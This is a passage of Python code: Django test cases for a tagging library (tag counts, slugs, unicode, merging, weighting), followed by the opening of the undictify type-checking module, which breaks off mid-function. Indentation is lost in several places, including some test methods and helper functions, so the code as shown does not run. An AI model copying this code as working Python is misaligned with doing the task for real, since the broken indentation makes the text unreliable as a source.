        self.assertEqual(len(rel_t2_m2[2]), 2)
        self.assertEqual(rel_t2_m2[2][0], t3)
        self.assertEqual(rel_t2_m2[2][1], t4)
def test_get_related_objects_flat(self):
"Check the class method returns a flat list of related instances"
t1 = self.create(self.model1, name="Test 1", singletag="Mr", tags="blue")
t2 = self.create(self.model1, name="Test 2", singletag="Mr", tags="green")
t3 = self.create(self.model2, name="Test 3", singletag="Mrs", tags="green")
t4 = self.create(self.model2, name="Test 4", singletag="Mr", tags="green")
# Check Mr
singletag1 = self.tag_model.objects.get(name="Mr")
rel_st1 = singletag1.get_related_objects(flat=True)
self.assertEqual(len(rel_st1), 3)
rel_st1.sort(key=lambda tag: tag.name)
self.assertEqual(rel_st1[0], t1)
self.assertEqual(rel_st1[1], t2)
self.assertEqual(rel_st1[2], t4)
# Check Mrs
singletag2 = self.tag_model.objects.get(name="Mrs")
rel_st2 = singletag2.get_related_objects(flat=True)
self.assertEqual(len(rel_st2), 1)
self.assertEqual(rel_st2[0], t3)
# Check blue
tags1 = self.tag_model.objects.get(name="blue")
rel_t1 = tags1.get_related_objects(flat=True)
self.assertEqual(len(rel_t1), 1)
self.assertEqual(rel_t1[0], t1)
# Check green
tags2 = self.tag_model.objects.get(name="green")
rel_t2 = tags2.get_related_objects(flat=True)
self.assertEqual(len(rel_t2), 3)
rel_t2.sort(key=lambda tag: tag.name)
self.assertEqual(rel_t2[0], t2)
self.assertEqual(rel_t2[1], t3)
self.assertEqual(rel_t2[2], t4)
def test_get_related_objects_flat_distinct(self):
"Check the class method returns a flat list of distinct related instances"
t1 = self.create(self.model1, name="<NAME>", singletag="Mr", tags="blue")
t2 = self.create(self.model2, name="<NAME>", singletag="blue", tags="blue")
# Check blue non-distinct
tags1 = self.tag_model.objects.get(name="blue")
rel_t1 = tags1.get_related_objects(flat=True)
self.assertEqual(len(rel_t1), 3)
rel_t1.sort(key=lambda tag: tag.name)
self.assertEqual(rel_t1[0], t1)
self.assertEqual(rel_t1[1], t2)
self.assertEqual(rel_t1[2], t2)
# Check blue distinct
rel_t2 = tags1.get_related_objects(flat=True, distinct=True)
self.assertEqual(len(rel_t2), 2)
rel_t2.sort(key=lambda tag: tag.name)
self.assertEqual(rel_t2[0], t1)
self.assertEqual(rel_t2[1], t2)
def test_get_related_objects_flat_include_standard(self):
"""
Check the class method returns a flat list of related instances,
including standard relationships
No need to test other options with include_standard, uses same code
"""
t1 = self.create(self.model1, name="<NAME>", singletag="Mr", tags="blue")
singletag1 = self.tag_model.objects.get(name="Mr")
tags1 = self.tag_model.objects.get(name="blue")
t2 = self.create(self.model_nontag, name="Test 2", fk=singletag1, mm=[tags1])
# Check Mr
rel_st1 = singletag1.get_related_objects(flat=True, include_standard=True)
self.assertEqual(len(rel_st1), 2)
rel_st1.sort(key=lambda tag: tag.name)
self.assertEqual(rel_st1[0], t1)
self.assertEqual(rel_st1[1], t2)
# Check blue
rel_t1 = tags1.get_related_objects(flat=True, include_standard=True)
self.assertEqual(len(rel_t1), 2)
rel_t1.sort(key=lambda tag: tag.name)
self.assertEqual(rel_t1[0], t1)
self.assertEqual(rel_t1[1], t2)
def test_increment(self):
"Increment the tag count"
tag1 = self.create(self.tag_model, name="blue")
self.assertInstanceEqual(tag1, count=0)
tag1.increment()
self.assertInstanceEqual(tag1, count=1)
    def test_increment_db(self):
        "Increment the tag count using the DB value, not in-memory"
        tag1 = self.create(self.tag_model, name="blue")
        # Second python instance for the same row
        tag2 = self.tag_model.objects.get(pk=tag1.pk)
        self.assertEqual(tag1.count, 0)
        self.assertEqual(tag2.count, 0)
        tag1.increment()
        # The DB row is updated for both instances...
        self.assertInstanceEqual(tag1, count=1)
        self.assertInstanceEqual(tag2, count=1)
        # ...but only the instance that called increment() refreshes its
        # in-memory count; the stale tag2 object still reads 0
        self.assertEqual(tag1.count, 1)
        self.assertEqual(tag2.count, 0)
        tag2.increment()
        self.assertInstanceEqual(tag1, count=2)
        self.assertInstanceEqual(tag2, count=2)
        # Now tag1 is the stale one
        self.assertEqual(tag1.count, 1)
        self.assertEqual(tag2.count, 2)
def test_decrement(self):
tag1 = self.create(self.tag_model, name="blue", count=2)
self.assertTagModel(self.tag_model, {"blue": 2})
tag1.decrement()
self.assertTagModel(self.tag_model, {"blue": 1})
def test_decrement_delete(self):
tag1 = self.create(self.tag_model, name="blue", count=1)
self.assertTagModel(self.tag_model, {"blue": 1})
tag1.decrement()
self.assertTagModel(self.tag_model, {})
def test_decrement_delete_protected(self):
    "Decrementing a protected tag to zero keeps it in the database"
    tag = self.create(self.tag_model, name="blue", count=1, protected=True)
    self.assertTagModel(self.tag_model, {"blue": 1})
    tag.decrement()
    self.assertTagModel(self.tag_model, {"blue": 0})
def test_decrement_delete_hasrefs(self):
    """
    Check that when a tag's count hits 0, but still has non-tag field
    references, that it isn't deleted - don't want to cascade/break refs
    """
    # Create tags with false count
    tag1 = self.create(self.tag_model, name="blue", count=1)
    tag2 = self.create(self.tag_model, name="red", count=1)
    self.assertTagModel(self.tag_model, {"blue": 1, "red": 1})

    # Create object with conventional references to tags - a ForeignKey
    # and a ManyToManyField pointing at the tag model directly
    t1 = self.create(self.model_nontag, name="CharField", fk=tag1, mm=[tag2])
    self.assertInstanceEqual(t1, name="CharField", fk=tag1, mm=[tag2])

    # No change to count - conventional references don't affect tag counts
    self.assertTagModel(self.tag_model, {"blue": 1, "red": 1})

    # Check get_related_objects knows about them
    self.assertEqual(
        len(tag1.get_related_objects(flat=True, include_standard=True)), 1
    )
    self.assertEqual(
        len(tag2.get_related_objects(flat=True, include_standard=True)), 1
    )

    # Now decrement counts to 0, but tags remain because of the refs above
    tag1.decrement()
    tag2.decrement()
    self.assertTagModel(self.tag_model, {"blue": 0, "red": 0})
def test_update_count(self):
    "Purposely knock the count off and update it"
    t1 = self.create(self.model1, name="Test 1", tags="blue")
    tag1 = self.tag_model.objects.get(name="blue")
    self.assertTagModel(self.tag_model, {"blue": 1})

    # Force a wrong count directly; save() persists it as-is
    tag1.count = 3
    tag1.save()
    self.assertTagModel(self.tag_model, {"blue": 3})

    # update_count() recalculates the count from actual references
    tag1.update_count()
    self.assertTagModel(self.tag_model, {"blue": 1})

    # Removing the last reference deletes the (unprotected) tag
    t1.delete()
    self.assertTagModel(self.tag_model, {})
def test_slug_set(self):
    "Creating a tag generates its slug from the name"
    tag = self.tag_model.objects.create(name="One and Two!")
    self.assertEqual(tag.slug, "one-and-two")
def test_slug_saved(self):
    "The generated slug is persisted to the database"
    created = self.tag_model.objects.create(name="One and Two!")
    reloaded = self.tag_model.objects.get(name="One and Two!")
    self.assertEqual(created.slug, reloaded.slug)
    self.assertEqual(reloaded.slug, "one-and-two")
def test_slug_clash(self):
    "Clashing slugs get numeric suffixes to remain unique"
    names = ["one and two", "One and Two!", "One and Two?", "One and Two."]
    expected_slugs = [
        "one-and-two",
        "one-and-two_1",
        "one-and-two_2",
        "one-and-two_3",
    ]
    # Creation order determines which tag gets the unsuffixed slug
    created = [self.tag_model.objects.create(name=name) for name in names]
    for tag, slug in zip(created, expected_slugs):
        self.assertEqual(tag.slug, slug)
    # Reload from the database to confirm the slugs were saved
    for name, slug in zip(names, expected_slugs):
        self.assertEqual(self.tag_model.objects.get(name=name).slug, slug)
def test_tag_model_factory(self):
    "The tag model factory supports setting max lengths"
    meta = test_models.TagSlugShorterModel._meta
    self.assertEqual(meta.get_field("name").max_length, 20)
    self.assertEqual(meta.get_field("slug").max_length, 10)
def test_long_slug_truncates(self):
    "A slug longer than its field's max_length is truncated"
    model = test_models.TagSlugShorterModel
    max_name = model._meta.get_field("name").max_length
    max_slug = model._meta.get_field("slug").max_length
    # Sanity check: the slug field really is shorter than the name field
    self.assertLess(max_slug, max_name)
    tag = model.objects.create(name="x" * max_name)
    self.assertEqual(tag.name, "x" * max_name)
    self.assertEqual(tag.slug, "x" * max_slug)
def test_long_slug_clash_truncates(self):
    "Check clashing slug fields are truncated correctly"
    TestModel = test_models.TagSlugShorterModel
    name_length = TestModel._meta.get_field("name").max_length
    slug_length = TestModel._meta.get_field("slug").max_length
    self.assertLess(slug_length, name_length)

    # Two names differing only in their last character - both would
    # truncate to the same slug
    ln1 = "{}{}".format("x" * (name_length - 1), "1")
    ln2 = "{}{}".format("x" * (name_length - 1), "2")
    t1a = TestModel.objects.create(name=ln1)
    t2a = TestModel.objects.create(name=ln2)
    self.assertEqual(t1a.name, ln1)
    self.assertEqual(t1a.slug, "x" * slug_length)
    self.assertEqual(t2a.name, ln2)
    # The clashing slug is truncated further to make room for the
    # uniqueness suffix (SLUG_TRUNCATE_UNIQUE characters wide)
    slug2 = "{}_{}".format("x" * (slug_length - SLUG_TRUNCATE_UNIQUE), "1")
    self.assertEqual(t2a.slug, slug2)
# ##############################################################################
# ###### Test TagMeta in tag model
# ##############################################################################
class TagMetaTest(TagTestManager, TestCase):
    """
    Test TagMeta class. Builds on tests in tests_options.
    """

    def test_sets_options(self):
        "Check TagMeta sets the options"
        opt = test_models.TagMetaAbstractModel.tag_options
        # Check local options - items(with_defaults=False) returns only the
        # options set explicitly in TagMeta, not the global defaults
        cls_opt = opt.items(with_defaults=False)
        self.assertEqual(cls_opt["initial"], ["Adam", "Brian", "Chris"])
        self.assertEqual(cls_opt["force_lowercase"], True)
        self.assertEqual(cls_opt["max_count"], 5)
        self.assertTrue("case_sensitive" not in cls_opt)
        # Check default options are still reachable as attributes
        self.assertEqual(opt.case_sensitive, False)

    def test_inheritance(self):
        "Check TagMeta can be inherited and overridden"
        opt_abstract = test_models.TagMetaAbstractModel.tag_options
        opt = test_models.TagMetaModel.tag_options
        # Check they're not shared instances
        self.assertNotEqual(id(opt_abstract), id(opt))
        self.assertNotEqual(id(opt), id(tag_models.models.BaseTagModel.tag_options))
        # Check local options set by the concrete subclass
        cls_opt = opt.items(with_defaults=False)
        self.assertEqual(cls_opt["case_sensitive"], True)
        self.assertEqual(cls_opt["max_count"], 10)
        # Local options will also include inherited options; max_count is
        # overridden from 5 to 10, case_sensitive from False to True
        self.assertEqual(opt.initial, ["Adam", "Brian", "Chris"])
        self.assertEqual(opt.force_lowercase, True)
        self.assertEqual(opt.max_count, 10)
        self.assertEqual(opt.case_sensitive, True)
# ##############################################################################
# ###### Test unicode in tag model
# ##############################################################################
class TagModelUnicodeTest(TagTestManager, TestCase):
    """
    Test unicode tags - with unicode slugs disabled, and forced to not use unidecode,
    even if available
    """

    manage_models = [test_models.MixedTest]

    def setUpExtra(self):
        # Disable unidecode support for the duration of the test, so
        # slugification cannot transliterate non-ascii characters
        self.unidecode_status = tag_utils.unidecode
        tag_utils.unidecode = None
        self.model = test_models.MixedTest
        self.tag_model = test_models.MixedTestTagModel
        self.o1 = self.create(
            self.model, name="Test", singletag="男の子", tags="boy, niño, 男の子"
        )

    def tearDownExtra(self):
        # Restore whatever unidecode support existed before the test
        tag_utils.unidecode = self.unidecode_status

    def test_setup(self):
        "Check setup created tags as expected"
        self.assertTagModel(self.tag_model, {"boy": 1, "niño": 1, "男の子": 2})

    # Check lookup

    def test_get_singletag_get(self):
        "Check unicode singletag name matches"
        t1 = self.model.objects.get(singletag="男の子")
        self.assertEqual(t1.pk, self.o1.pk)

    def test_get_tag_ascii(self):
        "Check unicode tag name matches when ascii"
        t1 = self.model.objects.get(tags="boy")
        self.assertEqual(t1.pk, self.o1.pk)

    def test_get_tag_extended_ascii(self):
        "Check unicode tag name matches when extended ascii"
        t1 = self.model.objects.get(tags="niño")
        self.assertEqual(t1.pk, self.o1.pk)

    def test_get_tag_japanese(self):
        "Check unicode tag name matches when above extended ascii"
        t1 = self.model.objects.get(tags="男の子")
        self.assertEqual(t1.pk, self.o1.pk)

    # Check render

    def test_singletag_render(self):
        "Check unicode singletag name renders"
        t1 = self.model.objects.get(name="Test")
        self.assertEqual(str(t1.singletag), "男の子")

    def test_tag_render(self):
        "Check unicode tag name renders"
        t1 = self.model.objects.get(name="Test")
        tags = list(t1.tags.all())
        self.assertEqual(str(tags[0]), "boy")
        self.assertEqual(str(tags[1]), "niño")
        self.assertEqual(str(tags[2]), "男の子")

    def test_tag_string_render(self):
        "Check unicode tags string renders"
        t1 = self.model.objects.get(name="Test")
        self.assertEqual(str(t1.tags), "boy, niño, 男の子")

    # Check slugs

    def test_slug_ascii(self):
        "Check ascii tag name slugified to ascii"
        t1 = self.tag_model.objects.get(name="boy")
        self.assertEqual(t1.slug, "boy")

    def test_slug_extended_ascii(self):
        "Check extended ascii tag name slugified to ascii"
        t1 = self.tag_model.objects.get(name="niño")
        self.assertEqual(t1.slug, "nino")

    def test_slug_japanese(self):
        "Check a name with no ascii equivalent slugifies to the placeholder"
        name = "男の子"
        t1 = self.tag_model.objects.get(name=name)
        self.assertEqual(t1.name, name)
        # With unidecode disabled no character survives slugification
        self.assertEqual(t1.slug, "_")
# Optional dependency: unidecode transliterates unicode to ascii.
# Fall back to None when it is not installed, so code can test for it.
try:
    from unidecode import unidecode
except ImportError:
    unidecode = None
class TagModelFullUnicodeTest(TagTestManager, TestCase):
    """
    Test unicode tags, with unicode enabled

    This only affects slugs
    """

    manage_models = [test_models.MixedTest]

    def setUpExtra(self):
        # Enable unicode slug support for the duration of the test
        # (original comment said "Disable", but the flag is set to True)
        self.unicode_status = tagulous_settings.SLUG_ALLOW_UNICODE
        tagulous_settings.SLUG_ALLOW_UNICODE = True
        self.model = test_models.MixedTest
        self.tag_model = test_models.MixedTestTagModel
        self.o1 = self.create(
            self.model, name="Test", singletag="男の子", tags="boy, niño, 男の子"
        )

    def tearDownExtra(self):
        # Restore the original setting
        tagulous_settings.SLUG_ALLOW_UNICODE = self.unicode_status

    def test_setup(self):
        "Check setup created tags as expected"
        self.assertTagModel(self.tag_model, {"boy": 1, "niño": 1, "男の子": 2})

    def test_slug_ascii(self):
        "Check ascii tag name slugified to ascii"
        t1 = self.tag_model.objects.get(name="boy")
        self.assertEqual(t1.slug, "boy")

    def test_slug_extended_ascii(self):
        "Check extended ascii characters are preserved in the slug"
        t1 = self.tag_model.objects.get(name="niño")
        self.assertEqual(t1.slug, "niño")

    def test_slug_japanese(self):
        "Check unicode characters are preserved in the slug"
        name = "男の子"
        t1 = self.tag_model.objects.get(name=name)
        self.assertEqual(t1.slug, name)
# ##############################################################################
# ###### Test tag merging
# ##############################################################################
class TagModelMergeTest(TagTestManager, TestCase):
    """
    Test tag merging
    """

    manage_models = [test_models.MixedTest, test_models.MixedRefTest]

    def test_merge_tags(self):
        "Merge a queryset of tags referenced by two different models"
        tag_model = test_models.MixedTestTagModel

        # Set up database: each tag is used by singletag and tags fields
        # on both models, giving each a count of 4
        a1 = self.create(test_models.MixedTest, name="a1", singletag="one", tags="one")
        a2 = self.create(test_models.MixedTest, name="a2", singletag="two", tags="two")
        a3 = self.create(
            test_models.MixedTest, name="a3", singletag="three", tags="three"
        )
        b1 = self.create(
            test_models.MixedRefTest, name="b1", singletag="one", tags="one"
        )
        b2 = self.create(
            test_models.MixedRefTest, name="b2", singletag="two", tags="two"
        )
        b3 = self.create(
            test_models.MixedRefTest, name="b3", singletag="three", tags="three"
        )

        # Confirm it's correct
        self.assertTagModel(tag_model, {"one": 4, "two": 4, "three": 4})
        self.assertInstanceEqual(a1, singletag="one", tags="one")
        self.assertInstanceEqual(a2, singletag="two", tags="two")
        self.assertInstanceEqual(a3, singletag="three", tags="three")
        self.assertInstanceEqual(b1, singletag="one", tags="one")
        self.assertInstanceEqual(b2, singletag="two", tags="two")
        self.assertInstanceEqual(b3, singletag="three", tags="three")

        # Merge tags - "one" absorbs all references held by the others
        s1 = tag_model.objects.get(name="one")
        s1.merge_tags(tag_model.objects.filter(name__in=["one", "two", "three"]))

        # Check it's correct: all 12 references now point at "one"
        self.assertTagModel(tag_model, {"one": 12})
        self.assertInstanceEqual(a1, singletag="one", tags="one")
        self.assertInstanceEqual(a2, singletag="one", tags="one")
        self.assertInstanceEqual(a3, singletag="one", tags="one")
        self.assertInstanceEqual(b1, singletag="one", tags="one")
        self.assertInstanceEqual(b2, singletag="one", tags="one")
        self.assertInstanceEqual(b3, singletag="one", tags="one")

    def test_merge_multiple_tags(self):
        "Test merging a queryset of multiple tags"
        tag_model = test_models.MixedTestTagModel

        # Set up database
        t1 = self.create(test_models.MixedTest, name="Test 1", tags="blue, green, red")
        t2 = self.create(test_models.MixedTest, name="Test 2", tags="blue, green, red")

        # Confirm it's correct
        self.assertTagModel(tag_model, {"blue": 2, "green": 2, "red": 2})
        self.assertInstanceEqual(t1, tags="blue, green, red")
        self.assertInstanceEqual(t2, tags="blue, green, red")

        # Merge tags
        s1 = tag_model.objects.get(name="blue")
        s1.merge_tags(tag_model.objects.filter(name__in=["blue", "green", "red"]))

        # Confirm it's correct - duplicate refs collapse, so count stays 2
        self.assertTagModel(tag_model, {"blue": 2})
        self.assertInstanceEqual(t1, tags="blue")
        self.assertInstanceEqual(t2, tags="blue")

    def test_merge_by_name(self):
        "Test merging a list of tag names, including tags which don't exist"
        tag_model = test_models.MixedTestTagModel

        # Set up database
        t1 = self.create(test_models.MixedTest, name="Test 1", tags="blue, green, red")
        t2 = self.create(test_models.MixedTest, name="Test 2", tags="blue, green, red")

        # Confirm it's correct
        self.assertTagModel(tag_model, {"blue": 2, "green": 2, "red": 2})
        self.assertInstanceEqual(t1, tags="blue, green, red")
        self.assertInstanceEqual(t2, tags="blue, green, red")

        # Merge tags - "pink" doesn't exist and must be ignored, not raise
        s1 = tag_model.objects.get(name="blue")
        s1.merge_tags(["blue", "green", "red", "pink"])

        # Confirm it's correct
        self.assertTagModel(tag_model, {"blue": 2})
        self.assertInstanceEqual(t1, tags="blue")
        self.assertInstanceEqual(t2, tags="blue")

    def test_merge_by_obj_list(self):
        "Test merging a list of tag objects"
        tag_model = test_models.MixedTestTagModel
        t1 = self.create(test_models.MixedTest, name="Test 1", tags="blue, green, red")
        t2 = self.create(test_models.MixedTest, name="Test 2", tags="blue, green, red")

        # Merge tags - a plain list (not queryset) of instances
        s1 = tag_model.objects.get(name="blue")
        s1.merge_tags(list(tag_model.objects.all()))

        # Confirm it's correct
        self.assertTagModel(tag_model, {"blue": 2})
        self.assertInstanceEqual(t1, tags="blue")
        self.assertInstanceEqual(t2, tags="blue")

    def test_merge_by_tag_string(self):
        "Test merging a tag string, including tags which don't exist"
        tag_model = test_models.MixedTestTagModel
        t1 = self.create(test_models.MixedTest, name="Test 1", tags="blue, green, red")
        t2 = self.create(test_models.MixedTest, name="Test 2", tags="blue, green, red")

        # Merge tags - a comma-separated tag string is also accepted
        s1 = tag_model.objects.get(name="blue")
        s1.merge_tags("blue, green, red, pink")

        # Confirm it's correct
        self.assertTagModel(tag_model, {"blue": 2})
        self.assertInstanceEqual(t1, tags="blue")
        self.assertInstanceEqual(t2, tags="blue")
# ##############################################################################
# ###### Test tag model manager and queryset
# ##############################################################################
class TagModelQuerySetTest(TagTestManager, TestCase):
    """
    Test tag model queryset and manager
    """

    manage_models = [test_models.TagFieldOptionsModel]

    def setUpExtra(self):
        self.model = test_models.TagFieldOptionsModel
        self.tag_model = self.model.initial_list.tag_model
        # NOTE(review): "<NAME>" looks like a redaction of "David, Eric" -
        # test_setup below expects counts {David: 1, Eric: 2}; confirm
        self.o1 = self.model.objects.create(name="Test 1", initial_list="<NAME>")
        self.o2 = self.model.objects.create(name="Test 2", initial_list="Eric, Frank")

    def test_setup(self):
        "Initial tags exist with count 0; assigned tags are counted"
        self.assertTagModel(
            self.model.initial_list,
            {"Adam": 0, "Brian": 0, "Chris": 0, "David": 1, "Eric": 2, "Frank": 1},
        )

    def test_initial(self):
        "initial() returns only the tags declared in the initial option"
        initial_only = self.tag_model.objects.initial()
        self.assertEqual(len(initial_only), 3)
        self.assertEqual(initial_only[0], "Adam")
        self.assertEqual(initial_only[1], "Brian")
        self.assertEqual(initial_only[2], "Chris")

    def test_filter_or_initial(self):
        "filter_or_initial() returns matching tags plus all initial tags"
        filtered = self.tag_model.objects.filter_or_initial(
            tagfieldoptionsmodel__name="Test 1"
        )
        self.assertEqual(len(filtered), 5)
        self.assertEqual(filtered[0], "Adam")
        self.assertEqual(filtered[1], "Brian")
        self.assertEqual(filtered[2], "Chris")
        self.assertEqual(filtered[3], "David")
        self.assertEqual(filtered[4], "Eric")

    def test_weight_scale_up(self):
        "Test weight() scales up to max"
        # Counts 0..2 scale to 2+2n: 0=2, 1=4, 2=6
        weighted = self.tag_model.objects.weight(min=2, max=6)
        self.assertEqual(len(weighted), 6)
        self.assertEqual(weighted[0].name, "Adam")
        self.assertEqual(weighted[0].weight, 2)
        self.assertEqual(weighted[1], "Brian")
        self.assertEqual(weighted[1].weight, 2)
        self.assertEqual(weighted[2], "Chris")
        self.assertEqual(weighted[2].weight, 2)
        self.assertEqual(weighted[3], "David")
        self.assertEqual(weighted[3].weight, 4)
        self.assertEqual(weighted[4], "Eric")
        self.assertEqual(weighted[4].weight, 6)
        self.assertEqual(weighted[5], "Frank")
        self.assertEqual(weighted[5].weight, 4)

    def test_weight_scale_down(self):
        "Test weight() scales down to max"
        # Add some extras so we can scale them 0.5n+2
        # Weight them so 0=2, 1=2 (rounded down), 4=4, 8=6
        # Eric will be used 8 times total - 6 more
        for i in range(6):
            self.model.objects.create(name="Test 3.%d" % i, initial_list="Eric")
        # Frank will be used 4 times total - 3 more
        for i in range(3):
            self.model.objects.create(name="Test 4.%d" % i, initial_list="Frank")
        self.assertTagModel(
            self.model.initial_list,
            {"Adam": 0, "Brian": 0, "Chris": 0, "David": 1, "Eric": 8, "Frank": 4},
        )
        weighted = self.tag_model.objects.weight(min=2, max=6)
        self.assertEqual(len(weighted), 6)
        self.assertEqual(weighted[0].name, "Adam")
        self.assertEqual(weighted[0].weight, 2)
        self.assertEqual(weighted[1], "Brian")
        self.assertEqual(weighted[1].weight, 2)
        self.assertEqual(weighted[2], "Chris")
        self.assertEqual(weighted[2].weight, 2)
        self.assertEqual(weighted[3], "David")
        self.assertEqual(weighted[3].weight, 2)
        self.assertEqual(weighted[4], "Eric")
        self.assertEqual(weighted[4].weight, 6)
        self.assertEqual(weighted[5], "Frank")
        self.assertEqual(weighted[5].weight, 4)

    def test_weight_integer(self):
        "Test weight() is a whole number"
        # A fractional min must not leak through to the annotated weight
        weighted = self.tag_model.objects.weight(min=2.5, max=6)
        self.assertEqual(weighted[0].name, "Adam")
        self.assertEqual(weighted[0].weight, 2)

    def test_weight_no_tags(self):
        "Test weight() when there are no tags"
        self.tag_model.objects.all().delete()
        self.assertEqual(self.tag_model.objects.count(), 0)
        weighted = self.tag_model.objects.weight()
        self.assertEqual(list(weighted.values_list("weight")), [])

    def test_weight_tags__no_associated(self):
        "Test weight() when there are tags but none are associated"
        self.tag_model.objects.all().delete()
        self.assertEqual(self.tag_model.objects.count(), 0)
        tag = self.tag_model.objects.create(name="test")
        self.assertEqual(tag.count, 0)
        weighted = self.tag_model.objects.weight()
        self.assertEqual(len(weighted), 1)
        self.assertEqual(weighted[0], "test")
        self.assertEqual(weighted[0].weight, 1)

    def test_weight_zero_no_tags(self):
        "Test weight() when there are no tags and minimum weight is zero"
        self.tag_model.objects.all().delete()
        self.assertEqual(self.tag_model.objects.count(), 0)
        weighted = self.tag_model.objects.weight(0, 6)
        self.assertEqual(list(weighted.values_list("weight")), [])

    def test_weight_zero_initial_tags(self):
        "Test weight() when there are tags but they have no count"
        self.assertEqual(self.tag_model.objects.count(), 6)
        weighted = self.tag_model.objects.weight(0, 6)
        self.assertEqual(
            list(weighted.values_list("weight", flat=True)), [0, 0, 0, 3, 6, 3]
        )

    def test_to_string(self):
        "Check manager and queryset can be converted to a tag string"
        self.assertEqual(
            str(self.tag_model.objects), "Adam, Brian, Chris, David, Eric, Frank",
        )
        self.assertEqual(
            str(self.tag_model.objects.all()), "Adam, Brian, Chris, David, Eric, Frank",
        )
        self.assertEqual(str(self.tag_model.objects.initial()), "Adam, Brian, Chris")
        self.assertEqual(str(self.o1.initial_list), "<NAME>")
# ##############################################################################
# ###### Test tag model with custom to_base
# ##############################################################################
class TagModelToBaseTest(TestCase):
    """
    Test autogenerated tag model with to_base
    """

    # NOTE(review): unlike the sibling test classes, this one does not mix
    # in TagTestManager, so manage_models may be inert here - confirm
    manage_models = [test_models.TagFieldOptionsModel]

    def test_custom_base_used(self):
        "The autogenerated tag model derives from the custom base class"
        tag_model = test_models.CustomTagBaseTest.singletag.tag_model
        self.assertTrue(issubclass(tag_model, test_models.CustomTagBase))
        self.assertTrue(issubclass(tag_model, tag_models.TagModel))
        self.assertTrue(tag_model.is_custom)
|
<reponame>VOlni/undictify
"""
undictify - Type-checked function calls at runtime
"""
import inspect
import sys
from functools import wraps
from typing import Any, Callable, Dict, List, Type, TypeVar, Union
VER_3_7_AND_UP = sys.version_info[:3] >= (3, 7, 0) # PEP 560
# pylint: disable=no-name-in-module
if VER_3_7_AND_UP:
from typing import _GenericAlias # type: ignore
else:
from typing import _Union # type: ignore
# pylint: enable=no-name-in-module
TypeT = TypeVar('TypeT')
def type_checked_constructor(skip: bool = False,
                             convert: bool = False) -> Callable[[Callable[..., TypeT]],
                                                                Callable[..., TypeT]]:
    """Replaces the constructor of the given class (in-place)
    with type-checked calls.

    :param skip: if True, ignore superfluous keys instead of raising
    :param convert: if True, attempt to convert mismatched value types
    :raises TypeError: when applied to a non-class, or to a class that
        is already wrapped by undictify
    """
    def call_decorator(func: Callable[..., TypeT]) -> Callable[..., TypeT]:
        if not inspect.isclass(func):
            # Fixed error message: the public decorator is named
            # type_checked_constructor (no leading underscore).
            raise TypeError('@type_checked_constructor may only be used for classes.')
        if _is_wrapped_func(func):
            raise TypeError('Class is already wrapped by undictify.')
        # Ideally we could prevent type_checked_constructor to be used
        # as a normal function instead of a decorator.
        # However this turns out to be very tricky,
        # and given solutions break down on some corner cases.
        # https://stackoverflow.com/questions/52191968/check-if-a-function-was-called-as-a-decorator
        func_name = _get_log_name(func)
        # Classes that define a custom __new__ are wrapped there;
        # object.__new__'s signature is exactly (args, kwargs), which is how
        # we detect "no custom __new__" and fall back to __init__.
        signature_new = inspect.signature(func.__new__)
        signature_new_param_names = [param.name for param in signature_new.parameters.values()]
        if signature_new_param_names != ['args', 'kwargs']:
            signature_ctor = signature_new
            replace_init = False
            original_ctor = func.__new__
        else:
            original_ctor = func.__init__  # type: ignore
            signature_ctor = inspect.signature(original_ctor)
            replace_init = True

        @wraps(original_ctor)
        def wrapper(first_arg: Any, *args: Any, **kwargs: Any) -> TypeT:
            # first_arg is self (for __init__) or cls (for __new__)
            kwargs_dict = _merge_args_and_kwargs(
                signature_ctor, func_name, [first_arg] + list(args),
                kwargs)
            return _unpack_dict(  # type: ignore
                original_ctor,
                signature_ctor,
                first_arg,
                kwargs_dict,
                skip,
                convert)

        if replace_init:
            func.__init__ = wrapper  # type: ignore
        else:
            func.__new__ = wrapper  # type: ignore
        # Mark the class so double-wrapping is detected.
        setattr(func, '__undictify_wrapped_func__', func)
        return func
    return call_decorator
def type_checked_call(skip: bool = False,
                      convert: bool = False) -> Callable[[Callable[..., TypeT]],
                                                         Callable[..., TypeT]]:
    """Decorator factory: wrap a function with runtime type checks.

    :param skip: if True, ignore superfluous keys instead of raising
    :param convert: if True, attempt to convert mismatched value types
    :raises TypeError: when the function is already wrapped by undictify
    """
    def call_decorator(func: Callable[..., TypeT]) -> Callable[..., TypeT]:
        if _is_wrapped_func(func):
            raise TypeError('Function is already wrapped by undictify.')
        func_signature = inspect.signature(func)
        log_name = _get_log_name(func)

        @wraps(func)
        def wrapper(*call_args: Any, **call_kwargs: Any) -> TypeT:
            # Fold positionals into one kwargs dict, then run the
            # type-checked unpacking against the original function.
            merged = _merge_args_and_kwargs(func_signature, log_name,
                                            call_args, call_kwargs)
            return _unpack_dict(  # type: ignore
                func,
                func_signature,
                None,
                merged,
                skip,
                convert)

        # Remember the original so double-wrapping is detected.
        setattr(wrapper, '__undictify_wrapped_func__', func)
        return wrapper
    return call_decorator
def _get_log_name(var: Any) -> str:
"""Return var.__name__ if available, 'this object' otherwise."""
try:
return str(var.__name__)
except AttributeError:
return 'this object'
# Either a callable already wrapped by undictify or a plain callable.
WrappedOrFunc = Callable[..., TypeT]


def _is_wrapped_func(func: WrappedOrFunc) -> bool:
    # Wrapped callables carry the original target in this attribute
    # (set by type_checked_call / type_checked_constructor).
    return hasattr(func, '__undictify_wrapped_func__')
def _merge_args_and_kwargs(signature: inspect.Signature, name: str,
args: Any, kwargs: Any) -> Dict[str, Any]:
"""Returns one kwargs dictionary or
raises an exeption in case of overlapping-name problems."""
param_names = [param.name for param in signature.parameters.values()]
if len(args) > len(param_names):
raise TypeError(f'Too many parameters for {name}.')
args_as_kwargs = dict(zip(param_names, list(args)))
keys_in_args_and_kwargs = set.intersection(set(args_as_kwargs.keys()),
set(kwargs.keys()))
if keys_in_args_and_kwargs:
raise TypeError(f'The following parameters are given as '
f'arg and kwarg in call of {name}: '
f'{keys_in_args_and_kwargs}')
return {**args_as_kwargs, **kwargs}
def _unpack_dict(func: WrappedOrFunc,  # pylint: disable=too-many-arguments
                 signature: inspect.Signature,
                 first_arg: Any,
                 data: Dict[str, Any],
                 skip_superfluous: bool,
                 convert_types: bool) -> Any:
    """Constructs an object in a type-safe way from a dictionary.

    :param func: target callable (possibly undictify-wrapped)
    :param signature: signature of the target callable
    :param first_arg: self/cls for constructor calls, None for functions
    :param data: keyword arguments to validate and forward
    :param skip_superfluous: if False, unknown keys raise TypeError
    :param convert_types: forwarded to the per-value type check
    :raises TypeError: on unknown keys, unsupported parameter kinds or
        annotations, or missing non-Optional keys
    """
    assert _is_dict(data), 'Argument data needs to be a dictionary.'

    ctor_params: Dict[str, Any] = {}

    if not skip_superfluous:
